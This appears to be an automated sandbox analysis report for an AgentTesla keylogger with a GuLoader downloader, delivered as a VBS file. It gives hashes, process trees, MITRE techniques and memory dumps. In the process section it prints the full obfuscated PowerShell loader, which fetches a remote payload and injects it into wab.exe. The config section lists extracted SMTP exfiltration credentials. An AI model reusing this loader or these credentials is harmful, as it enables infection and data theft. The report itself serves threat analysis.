agenttesla | 86bbab9cc5ca682eb3f04ba4978a9ecb9c2421d2218005cdc1125e9abd558bbc

General

Target

86bbab9cc5ca682eb3f04ba4978a9ecb9c2421d2218005cdc1125e9abd558bbc.vbs
Size

41KB
MD5

4969242177332816fc4fcd83a5180d28
SHA1

cda9aab56c51225daa0a48c6ed43330f6a7f00a6
SHA256

86bbab9cc5ca682eb3f04ba4978a9ecb9c2421d2218005cdc1125e9abd558bbc
SHA512

bcbc618399502e0ceb7be462c07cb2e680dcaeebee1fb6c8642da9ca7d925048bead30b0a9b00151ebcc8630b0977e94134fa6ed0ed49c7cb5786820170fae42
SSDEEP

768:u0mgBVHWAZGc8NnKwiQYppCxL4WoEnzu9DP:NhqNnKwSC/oUzu97

Score

10^/10

agenttesla guloader downloader keylogger spyware stealer trojan

Malware Config

Extracted

Credentials

Protocol: smtp
Host:
mail.inkomech.com
Port:
587
Username:
amir.hussin@inkomech.com
Password:
Amir@2021

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.inkomech.com
Port:
587
Username:
amir.hussin@inkomech.com
Password:
Amir@2021
Email To:
williamslucy570@gmail.com

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

5 drive.google.com
9 drive.google.com
4 drive.google.com
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

13 api.ipify.org
14 api.ipify.org
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

2432 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

2472 powershell.exe
2432 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2472 set thread context of 2432 2472 powershell.exe wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid process

2236 powershell.exe
2472 powershell.exe
2472 powershell.exe
2432 wab.exe
2432 wab.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

2472 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 2236 powershell.exe
Token: SeDebugPrivilege 2472 powershell.exe
Token: SeDebugPrivilege 2432 wab.exe

flow	ioc
5	drive.google.com
9	drive.google.com
4	drive.google.com

flow	ioc
13	api.ipify.org
14	api.ipify.org

pid	process
2432	wab.exe

pid	process
2472	powershell.exe
2432	wab.exe

description	pid	process	target process
PID 2472 set thread context of 2432	2472	powershell.exe	wab.exe

pid	process
2236	powershell.exe
2472	powershell.exe
2472	powershell.exe
2432	wab.exe
2432	wab.exe

pid	process
2472	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2236	powershell.exe
Token: SeDebugPrivilege	2472	powershell.exe
Token: SeDebugPrivilege	2432	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 1772 wrote to memory of 2236	1772	WScript.exe	powershell.exe
PID 1772 wrote to memory of 2236	1772	WScript.exe	powershell.exe
PID 1772 wrote to memory of 2236	1772	WScript.exe	powershell.exe
PID 2236 wrote to memory of 2452	2236	powershell.exe	cmd.exe
PID 2236 wrote to memory of 2452	2236	powershell.exe	cmd.exe
PID 2236 wrote to memory of 2452	2236	powershell.exe	cmd.exe
PID 2236 wrote to memory of 2472	2236	powershell.exe	powershell.exe
PID 2236 wrote to memory of 2472	2236	powershell.exe	powershell.exe
PID 2236 wrote to memory of 2472	2236	powershell.exe	powershell.exe
PID 2236 wrote to memory of 2472	2236	powershell.exe	powershell.exe
PID 2472 wrote to memory of 2448	2472	powershell.exe	cmd.exe
PID 2472 wrote to memory of 2448	2472	powershell.exe	cmd.exe
PID 2472 wrote to memory of 2448	2472	powershell.exe	cmd.exe
PID 2472 wrote to memory of 2448	2472	powershell.exe	cmd.exe
PID 2472 wrote to memory of 2432	2472	powershell.exe	wab.exe
PID 2472 wrote to memory of 2432	2472	powershell.exe	wab.exe
PID 2472 wrote to memory of 2432	2472	powershell.exe	wab.exe
PID 2472 wrote to memory of 2432	2472	powershell.exe	wab.exe
PID 2472 wrote to memory of 2432	2472	powershell.exe	wab.exe
PID 2472 wrote to memory of 2432	2472	powershell.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\86bbab9cc5ca682eb3f04ba4978a9ecb9c2421d2218005cdc1125e9abd558bbc.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1772

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Cystometer Neals tyrannerne Appetiser Snderjydens Frocked #>;$Rondoens=(cmd /c set /A 115^^0);Function Unimaginatively ([String]$Aerifies){$Plenishes=[char][int]$Rondoens+'ubstring';$Darkle=8;$Udenomspladsers=Spyendes($Aerifies);For($Intervenerende=7; $Intervenerende -lt $Udenomspladsers; $Intervenerende+=$Darkle){$Rset=$Aerifies.$Plenishes.Invoke($Intervenerende, 1);$Bermmelige=$Bermmelige+$Rset;}$Bermmelige;}function Osteogangrene ($diasporaernes){. ($aaernes) ($diasporaernes);}function Spyendes ([String]$Lnproblems){$Promythic=$Lnproblems.Length-1;$Promythic;}$Sporedes=Unimaginatively ' ShieldTS,ocksprMisdde,a Semp.rnUdsondrsToppunkfImpetraeAerkedar ClavicrUnrepetiUnderstnReserveg.hermon ';$Udgiftsfres=Unimaginatively 'kl.dsenhTrompettfortaletDeplacepChancebsplanlgn:Indstud/eschato/RovenesdTebor er VareliiRousse,vFolkesteFrynses.Overwing lenarmoChronogo ReliqugReshufflHovedsye nsski.CyclospcTaliageo.eednesmOctobri/PowderluAntarctcFan tis?Photolue NonspexAction pBedstemo .ubdedr SilkehtPhrenic=Spl.cedd ClaspaoF.skeriw DeviernAi,rieclZonevisoDuctibiaScoliogdafbildn& OutstuiMechlindKultive=Kompone1Prefavo1ro,mandludvlgniODormm,s3Sta,dtijSoppedbeGurieks3Cogit,tzKaffebnIVareforPJacuarur Insert3Spali rAFlgenspcArrestu3EvakuerzRaadgi.6Skibski7,espotiU NdringeFunktiocSkovmrkD FjedsuF StyninxWristga5Velve lQBegir.s2cit.lesFSkarpskGMrkeli.pBero ndfkan evalAfhor e ';$aaernes=Unimaginatively 'Genea oi ivevenePlastvax pontop ';$legumin=Unimaginatively 'Sab tre$CoenantgBanalnelMindr.voUdflytbbDiskredaexplanalOverfri:AlkalieD Phrygaihtsstran RegnefnStreambiPtyalisnB,obookgAcclima Corpora=Frostsi ,odophtS.liseptt.rostboaObstetrrPseu optRevanch-Sympat BSkilllaiTrafikktEleuinpsFugeskeTPronater SykurvaDendritnHy.tegssBaan.spfFalbudteForjagerTrangsn Incircl-F.eudiaSBegoniaoMomskoduOverfarrBaldakicBlotlggeGastr,a Elektri$ SloebeUGlai.uldSyndsbegTilbageiKerberofNavngivt Skrives I.perff GovernrMartineeUnven issaxenma comput-Beduin DSvi gleeS,abrstsVinylentLagu.cuiundereanWhatretaHjredret PrintliChamaesoPrototynToggery S,mialu$PrivatiFEggberriStandsnrScabioueOppostiw.aarerso A.onner opularmWittuds ';Osteogangrene (Unimaginatively ' Aerobo$Lisieatg Trave,lBahutj oOutfighb Ravelpa Urtidel be,ewi: VestenFPhlo.otiExtricarUnna,igeBesyngewVietconoNormalfr olumnambik.ema=Noctamb$overdi,e capparnDimmit,vRamfeez: brekraaBadehaapSusannepPenta,edProvokea Gravstt PuhdinaOmklass ') ;Osteogangrene (Unimaginatively 'DekolleIBilinafmBandboxpUn,dergo onagenrPumpesstGeopol.-Bulter.MNeedle oForsikrdOve offuStereo,lMiseat.ePolitis G imrerBStudse iSammendt.ugernesB,nefdsTZonevisrArbej,saKortfrinToup kos AllegofFibrinoeTastaturInharmo ') ;$Fireworm=$Fireworm+'\Civilingenioeruddannelsen.Iso' ;Osteogangrene (Unimaginatively 'Trochle$ SwackggTegne ilWhoneheoPrecontbFiskefia Pr.sidlSemisen:Bourbo,SDifferekKasser,yYellowwtSmasheitSuffrageLekvarukFdselssd Indskre .aumetrAgterstsImporto=Byg.emo(StorrygT abirite Charl sSynchr.tEtablis-djvleudP N,nconaImplanttUdgangshFdselsd Creatio$PersoneFLoculikiGlycerorAndri teKritisawe,tersioCairbamrShinglemElmaale)Guestho ') ;while (-not $Skyttekders) {Osteogangrene (Unimaginatively 'Well osISulphocfAlkam.n Solarie(Termlyb$Horeh.sDPho.ochi Prest nUpclimbnNonoccui F,skemnFeins,hgTypolit.DandifiJSelskabo TauroebReceiptSgrigssktRegorgea Re.nsetEkse.ereAuto ox landeje- RdsteneSh ikhdqteorien Impropr$ InteroSfo sigtpMlstommoUklanderJ,ssicaenonpersd Scotche.eralpisAa,soms)Spanske Hamstri{Kons anSrunde itRec,rkuaShookssrTre,umst .laare-BetnksoSR famillLnoverfeKnokledeT akasspAppe di Untemp1Folklor}Preconye .ulpwolFattighsBhutanseTechniq{Int.rfaSTwel,emtFragikka LobbymrDomicelt emoler-TornsanSEnsilatlCestuiaeXenophoeTrica ip vejsh stillid1Nydanne;LavadelOSelamlisSeismset InkasseCskusinoDomsudsgoreophaaAitvaran FabledgInv ctir Waf skeRemsehynind,videStav,rk Unalms$Bal nceltranscoeTeutonigA.arteruEurasiemAdminisiLejevrdnLngdegr}Compute ');Osteogangrene (Unimaginatively ' Maria $StridorgOverdivlMinutvioG dspribAnt.parapartilslAngstkl:ClientrS Sentimk OpskreyAbel.ketIrmgardtLandinseSquibstkSunblindLovgivneVit.culrGads ilsFi,ende=bereths(SlusepoTSociusse B ombrsbambu,stVgskab.-PeriodiPGuttensaKloderntUnspotlhFornuft Tribual$repressFU,derbuiAlkalimrAbso,ute FabrikwSvmmeh,o opishr Ar,hflmforgaar) Laspey ') ;}Osteogangrene (Unimaginatively 'un.erpo$Skaaltag SuccinlBeautico Drateub AabnemaJoensscl Konver:Abodes K.ounteroPapulo nbelbsgrgKvabsosrMizz ine ,elrepsPsykosepForthpuaDetribalSesquihaSesbanvdTilmaalsShoppiee Te,tser Toothc3 ,eighb1 O.erel Appassi=Abstrus VoldgraG Th oneeSn.rrigtNo tang-PrecosmCKar linoPjk,eden uslimstFadecooeSelvangn,idebgetTubaist Hrvrksm$Rundry.F ortatiiRaygallrKlkketreErhvervwPreemino Dona.orReamsglmNickery ');Osteogangrene (Unimaginatively 'duckies$Stats lggooranulEquilu.oAeschynbLikeminaKal vrklChern v:ErnringT AfgiftaVillaenxAventreiNondefimGepid.eeLovformtDvekonseB.yantsrUdsagns Prokur= I,dfri Abesknt[FerritiSIndspily Au trasCerebrot Hurtlee wingstmGenopre.FuldtidCPr,aratoHierarcnC,nfiguvNomadiceNonfo srUnwil it Tattie]Lnindeh: idegad:Chig,taFQuilt.irJens.nloPositiomGelatinBHalsh gaSpa,dspsTrllemre Svrten6Taliped4DiffereS PotesttPusle.dr PilotfiFr.itlin NringsgRele at(Counter$alvorliK Wildl.o NavneenBe,iklegCarboxyrAlbuebeeSkibstisnono.sep BoflleaAtrophilRowdyisaPennsyldPelargosChartrieVa meisrAr,toce3 Biopla1Du.like)Annonce ');Osteogangrene (Unimaginatively ' Desser$ GuatemgMilligrlEv ngeloFaddersb celebrakartonnl etaphl: Sk,iveCTrffelsuFort,lkb ,utchibWils,niyBo,lleshAktiviso En,nciu Rommyespodargiestilige Meninti=U.lured anter[Forha,dSOmlbproy Lavt.nsProvoket Ind,oleFugt.ttm L,ftig.ForetraT TheromeUnregarxKlargoetResu,ds.interliE P.ptolnPetrosic Whatsho RecreadBoleworiMine,alnskrmprigBir fra]Granu,i: Fireta:ImpiercA,ermudaSXerophoCProno.nIStyrekoIAflytni. erhverGUnvoweleEnolizetSelvhj.SUngodl tTransfurPalmeriinationanMat chigTumbles(Prognos$bugser TOv.rglaa Krigerx St,kkeiAlleywamStyltereskri tetPaatalee Gitt,prKoussos) Strobo ');Osteogangrene (Unimaginatively 'Forsimp$Multi,rgFdmsvrtlSfor lao FrolicbUnsplenaLinka.elOverlbe: NydereASygesiksResurfabAnticeneJyllandsAktspaltBr stsvutangforssexolog=Sulphar$Ref,shiC Taktreufusionsb Net libLondon yOverconhH.mewauoSl ttetua othegsForegifeca,toko.K.ldeblsPressekuLashornb Ramni.sWeighmetTerrysxrcombingiAst,cionVersifigDisneyb(Glunch.3 Tra,sl4Siderea0Possies9benzina4Tenorfo2Wordlor, Foruda3Violone1Detailv7 syndet5Skrumpn5Unfinic)Forpagt ');Osteogangrene $Asbestus;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2236

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
3⤵
PID:2452

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Cystometer Neals tyrannerne Appetiser Snderjydens Frocked #>;$Rondoens=(cmd /c set /A 115^^0);Function Unimaginatively ([String]$Aerifies){$Plenishes=[char][int]$Rondoens+'ubstring';$Darkle=8;$Udenomspladsers=Spyendes($Aerifies);For($Intervenerende=7; $Intervenerende -lt $Udenomspladsers; $Intervenerende+=$Darkle){$Rset=$Aerifies.$Plenishes.Invoke($Intervenerende, 1);$Bermmelige=$Bermmelige+$Rset;}$Bermmelige;}function Osteogangrene ($diasporaernes){. ($aaernes) ($diasporaernes);}function Spyendes ([String]$Lnproblems){$Promythic=$Lnproblems.Length-1;$Promythic;}$Sporedes=Unimaginatively ' ShieldTS,ocksprMisdde,a Semp.rnUdsondrsToppunkfImpetraeAerkedar ClavicrUnrepetiUnderstnReserveg.hermon ';$Udgiftsfres=Unimaginatively 'kl.dsenhTrompettfortaletDeplacepChancebsplanlgn:Indstud/eschato/RovenesdTebor er VareliiRousse,vFolkesteFrynses.Overwing lenarmoChronogo ReliqugReshufflHovedsye nsski.CyclospcTaliageo.eednesmOctobri/PowderluAntarctcFan tis?Photolue NonspexAction pBedstemo .ubdedr SilkehtPhrenic=Spl.cedd ClaspaoF.skeriw DeviernAi,rieclZonevisoDuctibiaScoliogdafbildn& OutstuiMechlindKultive=Kompone1Prefavo1ro,mandludvlgniODormm,s3Sta,dtijSoppedbeGurieks3Cogit,tzKaffebnIVareforPJacuarur Insert3Spali rAFlgenspcArrestu3EvakuerzRaadgi.6Skibski7,espotiU NdringeFunktiocSkovmrkD FjedsuF StyninxWristga5Velve lQBegir.s2cit.lesFSkarpskGMrkeli.pBero ndfkan evalAfhor e ';$aaernes=Unimaginatively 'Genea oi ivevenePlastvax pontop ';$legumin=Unimaginatively 'Sab tre$CoenantgBanalnelMindr.voUdflytbbDiskredaexplanalOverfri:AlkalieD Phrygaihtsstran RegnefnStreambiPtyalisnB,obookgAcclima Corpora=Frostsi ,odophtS.liseptt.rostboaObstetrrPseu optRevanch-Sympat BSkilllaiTrafikktEleuinpsFugeskeTPronater SykurvaDendritnHy.tegssBaan.spfFalbudteForjagerTrangsn Incircl-F.eudiaSBegoniaoMomskoduOverfarrBaldakicBlotlggeGastr,a Elektri$ SloebeUGlai.uldSyndsbegTilbageiKerberofNavngivt Skrives I.perff GovernrMartineeUnven issaxenma comput-Beduin DSvi gleeS,abrstsVinylentLagu.cuiundereanWhatretaHjredret PrintliChamaesoPrototynToggery S,mialu$PrivatiFEggberriStandsnrScabioueOppostiw.aarerso A.onner opularmWittuds ';Osteogangrene (Unimaginatively ' Aerobo$Lisieatg Trave,lBahutj oOutfighb Ravelpa Urtidel be,ewi: VestenFPhlo.otiExtricarUnna,igeBesyngewVietconoNormalfr olumnambik.ema=Noctamb$overdi,e capparnDimmit,vRamfeez: brekraaBadehaapSusannepPenta,edProvokea Gravstt PuhdinaOmklass ') ;Osteogangrene (Unimaginatively 'DekolleIBilinafmBandboxpUn,dergo onagenrPumpesstGeopol.-Bulter.MNeedle oForsikrdOve offuStereo,lMiseat.ePolitis G imrerBStudse iSammendt.ugernesB,nefdsTZonevisrArbej,saKortfrinToup kos AllegofFibrinoeTastaturInharmo ') ;$Fireworm=$Fireworm+'\Civilingenioeruddannelsen.Iso' ;Osteogangrene (Unimaginatively 'Trochle$ SwackggTegne ilWhoneheoPrecontbFiskefia Pr.sidlSemisen:Bourbo,SDifferekKasser,yYellowwtSmasheitSuffrageLekvarukFdselssd Indskre .aumetrAgterstsImporto=Byg.emo(StorrygT abirite Charl sSynchr.tEtablis-djvleudP N,nconaImplanttUdgangshFdselsd Creatio$PersoneFLoculikiGlycerorAndri teKritisawe,tersioCairbamrShinglemElmaale)Guestho ') ;while (-not $Skyttekders) {Osteogangrene (Unimaginatively 'Well osISulphocfAlkam.n Solarie(Termlyb$Horeh.sDPho.ochi Prest nUpclimbnNonoccui F,skemnFeins,hgTypolit.DandifiJSelskabo TauroebReceiptSgrigssktRegorgea Re.nsetEkse.ereAuto ox landeje- RdsteneSh ikhdqteorien Impropr$ InteroSfo sigtpMlstommoUklanderJ,ssicaenonpersd Scotche.eralpisAa,soms)Spanske Hamstri{Kons anSrunde itRec,rkuaShookssrTre,umst .laare-BetnksoSR famillLnoverfeKnokledeT akasspAppe di Untemp1Folklor}Preconye .ulpwolFattighsBhutanseTechniq{Int.rfaSTwel,emtFragikka LobbymrDomicelt emoler-TornsanSEnsilatlCestuiaeXenophoeTrica ip vejsh stillid1Nydanne;LavadelOSelamlisSeismset InkasseCskusinoDomsudsgoreophaaAitvaran FabledgInv ctir Waf skeRemsehynind,videStav,rk Unalms$Bal nceltranscoeTeutonigA.arteruEurasiemAdminisiLejevrdnLngdegr}Compute ');Osteogangrene (Unimaginatively ' Maria $StridorgOverdivlMinutvioG dspribAnt.parapartilslAngstkl:ClientrS Sentimk OpskreyAbel.ketIrmgardtLandinseSquibstkSunblindLovgivneVit.culrGads ilsFi,ende=bereths(SlusepoTSociusse B ombrsbambu,stVgskab.-PeriodiPGuttensaKloderntUnspotlhFornuft Tribual$repressFU,derbuiAlkalimrAbso,ute FabrikwSvmmeh,o opishr Ar,hflmforgaar) Laspey ') ;}Osteogangrene (Unimaginatively 'un.erpo$Skaaltag SuccinlBeautico Drateub AabnemaJoensscl Konver:Abodes K.ounteroPapulo nbelbsgrgKvabsosrMizz ine ,elrepsPsykosepForthpuaDetribalSesquihaSesbanvdTilmaalsShoppiee Te,tser Toothc3 ,eighb1 O.erel Appassi=Abstrus VoldgraG Th oneeSn.rrigtNo tang-PrecosmCKar linoPjk,eden uslimstFadecooeSelvangn,idebgetTubaist Hrvrksm$Rundry.F ortatiiRaygallrKlkketreErhvervwPreemino Dona.orReamsglmNickery ');Osteogangrene (Unimaginatively 'duckies$Stats lggooranulEquilu.oAeschynbLikeminaKal vrklChern v:ErnringT AfgiftaVillaenxAventreiNondefimGepid.eeLovformtDvekonseB.yantsrUdsagns Prokur= I,dfri Abesknt[FerritiSIndspily Au trasCerebrot Hurtlee wingstmGenopre.FuldtidCPr,aratoHierarcnC,nfiguvNomadiceNonfo srUnwil it Tattie]Lnindeh: idegad:Chig,taFQuilt.irJens.nloPositiomGelatinBHalsh gaSpa,dspsTrllemre Svrten6Taliped4DiffereS PotesttPusle.dr PilotfiFr.itlin NringsgRele at(Counter$alvorliK Wildl.o NavneenBe,iklegCarboxyrAlbuebeeSkibstisnono.sep BoflleaAtrophilRowdyisaPennsyldPelargosChartrieVa meisrAr,toce3 Biopla1Du.like)Annonce ');Osteogangrene (Unimaginatively ' Desser$ GuatemgMilligrlEv ngeloFaddersb celebrakartonnl etaphl: Sk,iveCTrffelsuFort,lkb ,utchibWils,niyBo,lleshAktiviso En,nciu Rommyespodargiestilige Meninti=U.lured anter[Forha,dSOmlbproy Lavt.nsProvoket Ind,oleFugt.ttm L,ftig.ForetraT TheromeUnregarxKlargoetResu,ds.interliE P.ptolnPetrosic Whatsho RecreadBoleworiMine,alnskrmprigBir fra]Granu,i: Fireta:ImpiercA,ermudaSXerophoCProno.nIStyrekoIAflytni. erhverGUnvoweleEnolizetSelvhj.SUngodl tTransfurPalmeriinationanMat chigTumbles(Prognos$bugser TOv.rglaa Krigerx St,kkeiAlleywamStyltereskri tetPaatalee Gitt,prKoussos) Strobo ');Osteogangrene (Unimaginatively 'Forsimp$Multi,rgFdmsvrtlSfor lao FrolicbUnsplenaLinka.elOverlbe: NydereASygesiksResurfabAnticeneJyllandsAktspaltBr stsvutangforssexolog=Sulphar$Ref,shiC Taktreufusionsb Net libLondon yOverconhH.mewauoSl ttetua othegsForegifeca,toko.K.ldeblsPressekuLashornb Ramni.sWeighmetTerrysxrcombingiAst,cionVersifigDisneyb(Glunch.3 Tra,sl4Siderea0Possies9benzina4Tenorfo2Wordlor, Foruda3Violone1Detailv7 syndet5Skrumpn5Unfinic)Forpagt ');Osteogangrene $Asbestus;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2472

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
4⤵
PID:2448

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2432

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
f3f3e743b1d4d2d1c31984a0a4e1a1a8

SHA1
bea8a89be996eb8a61a5b6b7e33fc843394efabc

SHA256
8b1210b61eda1a59e1a61f304a2ec8df089e9df07eeaf236dd3f3389344d4dfd

SHA512
e93f2025dd4bf5abb9124a46be3c542309c8eccef2c779dc6f6e1f022c9a1b5760ad254435c9086529e8cd753cda1fc44363cb3e8bc9416f573b5d5b2644e5a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab908C.tmp
Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8IJVPJ6ZK9P13XAAMJIA.temp
Filesize
7KB

MD5
62645d9edba550e614828d203743b780

SHA1
a3c3859404325fe0314a6637a27fc9bd61293d5a

SHA256
b76760c1539228cf46dfa652823d8d10ba920a25d5137448ebf146697a2d440c

SHA512
c03cadc4acbafb0f01518ca43a0d90fb6fe98ae8baa0846f4c51054617cf6cc7c66f5740aaa9f4ef70dd9c828cc6a741ca530a587e4a9416caf9730e6c8df4d2

Download Submit
memory/2236-36-0x0000000002960000-0x00000000029E0000-memory.dmp

Filesize
512KB

Download
memory/2236-5-0x00000000020C0000-0x00000000020C8000-memory.dmp

Filesize
32KB

Download
memory/2236-72-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp

Filesize
9.6MB

Download
memory/2236-10-0x0000000002960000-0x00000000029E0000-memory.dmp

Filesize
512KB

Download
memory/2236-11-0x0000000002930000-0x0000000002952000-memory.dmp

Filesize
136KB

Download
memory/2236-12-0x0000000002960000-0x00000000029E0000-memory.dmp

Filesize
512KB

Download
memory/2236-13-0x0000000002840000-0x0000000002852000-memory.dmp

Filesize
72KB

Download
memory/2236-8-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp

Filesize
9.6MB

Download
memory/2236-7-0x0000000002960000-0x00000000029E0000-memory.dmp

Filesize
512KB

Download
memory/2236-9-0x0000000002960000-0x00000000029E0000-memory.dmp

Filesize
512KB

Download
memory/2236-6-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp

Filesize
9.6MB

Download
memory/2236-4-0x000000001B710000-0x000000001B9F2000-memory.dmp

Filesize
2.9MB

Download
memory/2236-37-0x0000000002960000-0x00000000029E0000-memory.dmp

Filesize
512KB

Download
memory/2236-31-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp

Filesize
9.6MB

Download
memory/2236-34-0x0000000002960000-0x00000000029E0000-memory.dmp

Filesize
512KB

Download
memory/2236-33-0x0000000002960000-0x00000000029E0000-memory.dmp

Filesize
512KB

Download
memory/2432-70-0x0000000077A80000-0x0000000077B56000-memory.dmp

Filesize
856KB

Download
memory/2432-47-0x0000000077AB6000-0x0000000077AB7000-memory.dmp

Filesize
4KB

Download
memory/2432-73-0x0000000000300000-0x0000000000342000-memory.dmp

Filesize
264KB

Download
memory/2432-80-0x000000001EB30000-0x000000001EB70000-memory.dmp

Filesize
256KB

Download
memory/2432-79-0x000000006F220000-0x000000006F90E000-memory.dmp

Filesize
6.9MB

Download
memory/2432-76-0x0000000001370000-0x0000000002A38000-memory.dmp

Filesize
22.8MB

Download
memory/2432-75-0x000000001EB30000-0x000000001EB70000-memory.dmp

Filesize
256KB

Download
memory/2432-74-0x000000006F220000-0x000000006F90E000-memory.dmp

Filesize
6.9MB

Download
memory/2432-46-0x0000000077A80000-0x0000000077B56000-memory.dmp

Filesize
856KB

Download
memory/2432-42-0x0000000001370000-0x0000000002A38000-memory.dmp

Filesize
22.8MB

Download
memory/2432-43-0x0000000077890000-0x0000000077A39000-memory.dmp

Filesize
1.7MB

Download
memory/2432-68-0x0000000000300000-0x0000000001362000-memory.dmp

Filesize
16.4MB

Download
memory/2472-35-0x0000000006B30000-0x00000000081F8000-memory.dmp

Filesize
22.8MB

Download
memory/2472-39-0x00000000738D0000-0x0000000073E7B000-memory.dmp

Filesize
5.7MB

Download
memory/2472-19-0x0000000002C70000-0x0000000002CB0000-memory.dmp

Filesize
256KB

Download
memory/2472-38-0x0000000077890000-0x0000000077A39000-memory.dmp

Filesize
1.7MB

Download
memory/2472-32-0x0000000005640000-0x0000000005641000-memory.dmp

Filesize
4KB

Download
memory/2472-71-0x0000000006B30000-0x00000000081F8000-memory.dmp

Filesize
22.8MB

Download
memory/2472-30-0x0000000006B30000-0x00000000081F8000-memory.dmp

Filesize
22.8MB

Download
memory/2472-45-0x0000000006B30000-0x00000000081F8000-memory.dmp

Filesize
22.8MB

Download
memory/2472-41-0x0000000077A80000-0x0000000077B56000-memory.dmp

Filesize
856KB

Download
memory/2472-40-0x0000000002C70000-0x0000000002CB0000-memory.dmp

Filesize
256KB

Download
memory/2472-17-0x0000000002C70000-0x0000000002CB0000-memory.dmp

Filesize
256KB

Download
memory/2472-18-0x00000000738D0000-0x0000000073E7B000-memory.dmp

Filesize
5.7MB

Download
memory/2472-29-0x0000000002C70000-0x0000000002CB0000-memory.dmp

Filesize
256KB

Download
memory/2472-16-0x00000000738D0000-0x0000000073E7B000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads